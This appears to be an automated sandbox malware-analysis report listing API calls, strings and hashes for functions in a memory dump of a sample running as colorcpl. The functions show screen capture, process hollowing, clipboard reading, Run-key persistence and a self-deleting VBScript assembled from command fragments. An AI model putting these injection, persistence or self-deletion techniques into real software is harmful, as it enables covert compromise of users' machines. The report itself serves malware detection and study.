                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4212172061-0
                                                                                                                              • Opcode ID: 76e50daeecfa7913182e82c43a717c853aa0dbee19ed1f4573e7a19094e39c2e
                                                                                                                              • Instruction ID: 20c4ee6b6c221277fbd49e6234a8dee7588e0940abe74ad4edb472466ef66f72
                                                                                                                              • Opcode Fuzzy Hash: 76e50daeecfa7913182e82c43a717c853aa0dbee19ed1f4573e7a19094e39c2e
                                                                                                                              • Instruction Fuzzy Hash: 1261E771600605BAEB24AB34CCA5AF673ACEF06794F14046EE985D7280FB74F981C7E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0469BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0469BC1A
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0469BC24
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0000000A), ref: 0469BC31
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3906539128-0
                                                                                                                              • Opcode ID: d090a62d50b476dacb1a20645ea9a3a713c5983cf5f2ed89c4fcb043999defe5
                                                                                                                              • Instruction ID: b8a244d209afdee9c32e64b833704773baf343e239bda340d9035ab7640b8265
                                                                                                                              • Opcode Fuzzy Hash: d090a62d50b476dacb1a20645ea9a3a713c5983cf5f2ed89c4fcb043999defe5
                                                                                                                              • Instruction Fuzzy Hash: 4B31A2759012199BCB21DF64D98879DB7B8BF18710F5041DAE41CA7290EB74AF858F44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04693837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,046934BF,00000034,?,?,00000000), ref: 04693849
                                                                                                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,04693552,00000000,?,00000000), ref: 0469385F
                                                                                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,04693552,00000000,?,00000000,0467E251), ref: 04693871
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1815803762-0
                                                                                                                              • Opcode ID: 218c3e1c9c89943e45419277cca26f706821de942030bf973399ea900c632edc
                                                                                                                              • Instruction ID: e91a0a98b75237324af3464cfc2a6fe66c82fcd71d12376746f1c99eb4d19633
                                                                                                                              • Opcode Fuzzy Hash: 218c3e1c9c89943e45419277cca26f706821de942030bf973399ea900c632edc
                                                                                                                              • Instruction Fuzzy Hash: 98E09231308210BAEF300E25AC08F563BA9EB89760F20053DF716E41D4F2A29C858694
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A32B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002,00000000), ref: 046A32D6
                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,046A328B,00000000,046CE948,0000000C,046A33E2,00000000,00000002,00000000), ref: 046A32DD
                                                                                                                              • ExitProcess.KERNEL32 ref: 046A32EF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1703294689-0
                                                                                                                              • Opcode ID: 4fd9882b26684c23c0143434b2788c26dc207830b1b4f08a778cac6c9f199021
                                                                                                                              • Instruction ID: 7b30b8dc84c7e5e42b821723d81ebd17781409db89d184cc9f1fa0324303ca48
                                                                                                                              • Opcode Fuzzy Hash: 4fd9882b26684c23c0143434b2788c26dc207830b1b4f08a778cac6c9f199021
                                                                                                                              • Instruction Fuzzy Hash: 82E0BF71850648ABCF116F64D909A983F69FF45345F144014FE0546321EB3AEDD5CE84
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0466B711
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0466B71D
                                                                                                                              • CloseClipboard.USER32 ref: 0466B725
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$CloseDataOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2058664381-0
                                                                                                                              • Opcode ID: 797ce4e61174362dd8c6c04ff741caf7934b389af63aaf7a998d394a34484a0e
                                                                                                                              • Instruction ID: 32cf264a4b997fbefe117e5eb138cdcf62563ec1ec88e28e8a720f4d0b605c14
                                                                                                                              • Opcode Fuzzy Hash: 797ce4e61174362dd8c6c04ff741caf7934b389af63aaf7a998d394a34484a0e
                                                                                                                              • Instruction Fuzzy Hash: 2CE0EC71645330DFD7209B60D848BAE7A54DF61F51F408418B506DA294FA64BC44CBE5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04694C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 04694C6B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2325560087-3916222277
                                                                                                                              • Opcode ID: 7181fed418daa24ad34a715ad46785911bc02a599cc182b877890179d8608d5c
                                                                                                                              • Instruction ID: ee09a6b7a76eb631b8a748e07ec127eb7ce6ce55faecad4b139fc163b069c525
                                                                                                                              • Opcode Fuzzy Hash: 7181fed418daa24ad34a715ad46785911bc02a599cc182b877890179d8608d5c
                                                                                                                              • Instruction Fuzzy Hash: 9E516E75D05208AFDB14CFA9D48579ABBF4FB48314F14806BD815E7240E7B8AD45CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04672077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,04671F37,?,?,?,?,?), ref: 046720E7
                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046720EE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3859560861-0
                                                                                                                              • Opcode ID: bee71ab382e47186d2893e5d737b1f6088a2ad3aa79595c000b1c6bb9e9b070e
                                                                                                                              • Instruction ID: 4a0f2f18f6a6178980c1172ac38ecce670788f142f440ac3405916f1092587c0
                                                                                                                              • Opcode Fuzzy Hash: bee71ab382e47186d2893e5d737b1f6088a2ad3aa79595c000b1c6bb9e9b070e
                                                                                                                              • Instruction Fuzzy Hash: 00113972400A11EFDB309F64DD94827BBEAFF04B15304896EE19656921EB32F890DF60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04694B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0469487A), ref: 04694B4C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: f13c82a7bdf70318cb89628af0bae1149a975f090afb492010a17d1b69fe4d85
                                                                                                                              • Instruction ID: aaa7deeced3c741c4a57f99919299220116a527e68c6d7291e173c9e40b06c46
                                                                                                                              • Opcode Fuzzy Hash: f13c82a7bdf70318cb89628af0bae1149a975f090afb492010a17d1b69fe4d85
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06723FC1 Relevance: 1.3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: PkGNG
                                                                                                                              • API String ID: 0-263838557
                                                                                                                              • Opcode ID: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                              • Instruction ID: 7662130c95fcf600325f9933485e10490298c763f9e5a16eb707cbf84df9181b
                                                                                                                              • Opcode Fuzzy Hash: 2714db990c485d3c482822e4496f4e6700112c11046368f118222e6140812f9a
                                                                                                                              • Instruction Fuzzy Hash: FEE04F31000358FFCF916F54DC4CE593B7AEB40262F050864F90446135CB39DC52CB40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04678E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 04678E90
                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 04678E9D
                                                                                                                                • Part of subcall function 04679325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 04679355
                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 04678F13
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F2A
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F2D
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 04678F30
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 04678F51
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F62
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04678F65
                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 04678F89
                                                                                                                              • GetIconInfo.USER32(?,?), ref: 04678FBD
                                                                                                                              • DeleteObject.GDI32(?), ref: 04678FEC
                                                                                                                              • DeleteObject.GDI32(?), ref: 04678FF9
                                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 04679006
                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0467903C
                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 04679068
                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 046790D5
                                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 04679144
                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 04679168
                                                                                                                              • DeleteDC.GDI32(?), ref: 0467917C
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 0467917F
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 04679182
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0467918D
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 04679241
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 04679248
                                                                                                                              • DeleteDC.GDI32(?), ref: 04679258
                                                                                                                              • DeleteDC.GDI32(00000000), ref: 04679263
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                                              • String ID: DISPLAY
                                                                                                                              • API String ID: 479521175-865373369
                                                                                                                              • Opcode ID: ce8f232767b4fdb27db6952ba9914fe79e387aa8b881737129c7b74b460a6d9f
                                                                                                                              • Instruction ID: 667b2c7faf5128d5eaedf65c91208eb3f43fc4e0478bcfb87a7d340b772f64ae
                                                                                                                              • Opcode Fuzzy Hash: ce8f232767b4fdb27db6952ba9914fe79e387aa8b881737129c7b74b460a6d9f
                                                                                                                              • Instruction Fuzzy Hash: 8FC150715083409FE720DF24D848B6BBBE9EF89754F00491DFA8997250FB34AD48CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046780EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 04678136
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04678139
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0467814A
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467814D
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0467815E
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04678161
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 04678172
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04678175
                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04678217
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0467822F
                                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 04678245
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0467826B
                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 046782ED
                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 04678301
                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 04678341
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0467840B
                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 04678428
                                                                                                                              • ResumeThread.KERNEL32(?), ref: 04678435
                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0467844C
                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 04678457
                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 04678472
                                                                                                                              • GetLastError.KERNEL32 ref: 0467847A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                              • API String ID: 4188446516-3035715614
                                                                                                                              • Opcode ID: 533acaecce93a8deda69aa9c88447f34f28bdc5e8595e33eb1b003b308082dca
                                                                                                                              • Instruction ID: b7eee930b25b026853bf27d41ef813829def4bcd46c6aae5b86a7d082d4bc807
                                                                                                                              • Opcode Fuzzy Hash: 533acaecce93a8deda69aa9c88447f34f28bdc5e8595e33eb1b003b308082dca
                                                                                                                              • Instruction Fuzzy Hash: F5A14AB1644301AFEB109F64DC89B6ABBE8FF48748F00192EF64597290E7B4EC54CB65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466D420 Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04672850: TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
                                                                                                                                • Part of subcall function 04672850: WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0466D51D
                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0466D530
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0466D549
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0466D579
                                                                                                                                • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(0466A27D,00000000,046D52F0,pth_unenc,0466D0B8,046D52D8,046D52F0,?,pth_unenc), ref: 0466B8BB
                                                                                                                                • Part of subcall function 0466B8AC: UnhookWindowsHookEx.USER32(046D50F0), ref: 0466B8C7
                                                                                                                                • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0466B8D5
                                                                                                                                • Part of subcall function 0467C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,046C6468,00000000,00000000,0466D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0467C430
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,Function_00066468,Function_00066468,00000000), ref: 0466D7C4
                                                                                                                              • ExitProcess.KERNEL32 ref: 0466D7D0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                              • API String ID: 1861856835-1536747724
                                                                                                                              • Opcode ID: 3a762472ff8c2182c51bddff09258e89ed0a304c13f0f4c099321ff84d0bf6fc
                                                                                                                              • Instruction ID: 8634259ea7daac6b037a6e9bda8d5751e5ff4efa91b5ef2de7f31e83c8d51574
                                                                                                                              • Opcode Fuzzy Hash: 3a762472ff8c2182c51bddff09258e89ed0a304c13f0f4c099321ff84d0bf6fc
                                                                                                                              • Instruction Fuzzy Hash: 109161716042005BE714FB64D8A09FFB7E9AF9561AF50042DA44B932A0FF30BD49CA9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04672475 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,046D50E4,00000003), ref: 04672494
                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 046724A0
                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0467251A
                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04672529
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04672534
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0467253B
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 04672541
                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 04672572
                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 046725D5
                                                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 046725EF
                                                                                                                              • lstrcatW.KERNEL32(?,.exe), ref: 04672601
                                                                                                                                • Part of subcall function 0467C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,046C6468,00000000,00000000,0466D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0467C430
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 04672641
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 04672682
                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 04672697
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 046726A2
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 046726A9
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 046726AF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                              • String ID: .exe$WDH$exepath$open$temp_
                                                                                                                              • API String ID: 2649220323-3088914985
                                                                                                                              • Opcode ID: a2aa3f822618ebbca783c735f480d3b13939dd8fe1eb92e04424019c4fa57614
                                                                                                                              • Instruction ID: aeef169b8f69f348e4630523a62a431485a318ad03bb5d4da37b49ffb0165597
                                                                                                                              • Opcode Fuzzy Hash: a2aa3f822618ebbca783c735f480d3b13939dd8fe1eb92e04424019c4fa57614
                                                                                                                              • Instruction Fuzzy Hash: BF515571E40219ABEB10ABA0DC99EFE336DDB45754F004599F502A7280FF78AE85CA94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B047 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0467B13C
                                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0467B150
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,Function_000660A4), ref: 0467B178
                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,046D4EE0,00000000), ref: 0467B18E
                                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0467B1CF
                                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0467B1E7
                                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0467B1FC
                                                                                                                              • SetEvent.KERNEL32 ref: 0467B219
                                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0467B22A
                                                                                                                              • CloseHandle.KERNEL32 ref: 0467B23A
                                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0467B25C
                                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0467B266
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                              • API String ID: 738084811-1354618412
                                                                                                                              • Opcode ID: ae3faa0fa398938bfc58c467657d31773efb18f122e5e5c8fec30128574eddd4
                                                                                                                              • Instruction ID: 38e8cf7a2ddb4b14e0082cfc4bf8aa8a218b22f147137a096e58fe594addee3e
                                                                                                                              • Opcode Fuzzy Hash: ae3faa0fa398938bfc58c467657d31773efb18f122e5e5c8fec30128574eddd4
                                                                                                                              • Instruction Fuzzy Hash: D7518C716442046FE314BB70DCA5ABF7B9CEB9569DF00001DF54A92594FF30BD09CAAA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466D096 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 260registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04672850: TerminateProcess.KERNEL32(00000000,pth_unenc,0466F8C8), ref: 04672860
                                                                                                                                • Part of subcall function 04672850: WaitForSingleObject.KERNEL32(000000FF), ref: 04672873
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,046D52F0,?,pth_unenc), ref: 0466D1A5
                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0466D1B8
                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,046D52F0,?,pth_unenc), ref: 0466D1E8
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,046D52F0,?,pth_unenc), ref: 0466D1F7
                                                                                                                                • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(0466A27D,00000000,046D52F0,pth_unenc,0466D0B8,046D52D8,046D52F0,?,pth_unenc), ref: 0466B8BB
                                                                                                                                • Part of subcall function 0466B8AC: UnhookWindowsHookEx.USER32(046D50F0), ref: 0466B8C7
                                                                                                                                • Part of subcall function 0466B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0466B8D5
